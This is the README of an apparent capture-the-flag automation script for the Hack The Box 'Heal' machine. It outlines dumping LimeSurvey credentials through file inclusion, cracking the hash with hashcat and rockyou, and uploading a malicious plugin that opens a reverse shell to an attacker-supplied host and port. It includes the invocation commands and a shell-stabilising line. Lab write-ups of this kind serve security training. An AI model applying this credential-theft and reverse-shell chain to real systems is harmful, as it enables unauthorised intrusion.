A full exploitation automation script for the Heal Linux machine on Hack The Box. Full write Up -> WriteUp.md
This tool automates the following:
- Dumping LimeSurvey credentials via LFI
- Cracking the password hash manually (Hashcat/rockyou)
- Deploying a malicious LimeSurvey plugin to trigger a reverse shell
- Python 3.8+
requestsbs4
Install dependencies with:
pip install requests beautifulsoup4python3 autopwn.py --type getCredentialsThis will:
- Log in to thevulnerable API
- Dump the SQLite file via LFI
- Extract the email and password hash
- Print the hash with a note like:
Crack this hash using `hashcat` or a wordlist like `rockyou.txt`
Once cracked, proceed to the next phase with --type getRevShellSlime
You can crack it like this:
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txtpython3 autopwn.py \
--type getRevShellSlime \
--lhost <YOUR-IP> \
--lport <YOUR-PORT> \
--adminuser ralph@heal.htb \
--adminpass <CRACKED-PASSWORD>This will:
- Generate a malicious LimeSurvey plugin (
pwned.zip) - Log in to the LimeSurvey admin panel
- Upload and install the plugin
- Trigger the reverse shell
- Automatically start a listener and spawn a
/bin/bashshell
- The tool checks if the plugin is already uploaded before re-uploading it.
- You can kill the listener cleanly with
Ctrl+C. - The script handles CSRF token parsing and redirections automatically.
- If the reverse shell behaves oddly, you can stabilize it inside the shell with:
python3 -c 'import pty; pty.spawn("/bin/bash")'